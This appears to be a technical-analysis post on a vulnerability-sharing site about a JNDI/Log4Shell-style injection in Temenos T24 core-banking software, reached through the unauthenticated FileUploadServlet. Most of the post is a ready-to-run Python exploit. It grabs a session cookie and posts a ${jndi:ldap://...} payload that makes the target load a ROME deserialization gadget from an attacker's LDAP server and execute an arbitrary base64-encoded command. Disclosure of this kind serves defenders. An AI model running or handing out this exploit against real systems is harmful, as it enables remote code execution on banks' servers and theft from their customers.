blobla01 (5)
Last Login: December 21, 2021
Assessments
1
Score
5
blobla01's Latest (1) Contributions
Sort by:
Filter by:
4
Technical Analysis
The vulnerabilities exists in Temenos T24, widely used in core-banking,
There’re many entrypoints to trigger this vulnerability, as an example, i used the FileUploadServlet, because it’s accessible without any authentication:
package com.temenos.t24browser.servlets; public class FileUploadServlet extends HttpServlet { public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { FileUploadServlet.InnerServletClass innerObj = new FileUploadServlet.InnerServletClass(request); //truncated if (paramName.equalsIgnoreCase("uploadType")) { innerObj.setUploadType(paramValue); innerObj.setUploadTypeInfoFromT24(); <= //truncated
The uploadType is passed from user input, then passed to the innerObj
Content of innerObj.setUploadTypeInfoFromT24():
private void setUploadTypeInfoFromT24() { try { String responseXml = FileUploadServlet.this.sendUtilityRequest("OS.GET.UPLOAD.TYPE.INFO", this.uploadType, this.request); String uploadTypeInfo = Utils.getNodeFromString(responseXml, "uploadTypeInfo"); if (FileUploadServlet.LOGGER.isDebugEnabled()) { FileUploadServlet.LOGGER.debug("File upload: uploadTypeInfo=" + uploadTypeInfo); } if (!uploadTypeInfo.contains("<maxFileSize>")) { throw new IllegalArgumentException("EB-FILE.UPLOAD.TYPE.NOT.FOUND|" + this.uploadType + "|"); <= } }
As you can see, if the uploadType is invalidated, an exception will be thrown and passed to the LOGGER.error(),
PoC script:
import requests import base64 import sys target = sys.argv[1] cmd = base64.b64encode(sys.argv[2]) print("Attacking " + target) print("Cmd: "+ sys.argv[2]) ldap_url = "ldap://<server>:2389/Deserialization/ROME/command/base64/"+cmd burp0_url = target + "/BrowserWeb/servlet/BrowserServlet" burp0_headers = {"Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": target + "/BrowserWeb/", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"} ct = requests.get(burp0_url, headers=burp0_headers, verify=False) token = ct.cookies.get('JSESSIONID') burp0_url = target + "/BrowserWeb/servlet/FileUploadServlet" burp0_cookies = {"JSESSIONID": token} burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarygrfK28lThpyA12GG", "User-Agent": "Mozilla/5.0", "Connection": "close"} burp0_data = "------WebKitFormBoundarygrfK28lThpyA12GG\r\nContent-Disposition: form-data; name=\"uploadType\"\r\n\r\n${jndi:"+ldap_url+"}\r\n\r\n------WebKitFormBoundarygrfK28lThpyA12GG--\r\n" requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data, verify=False)
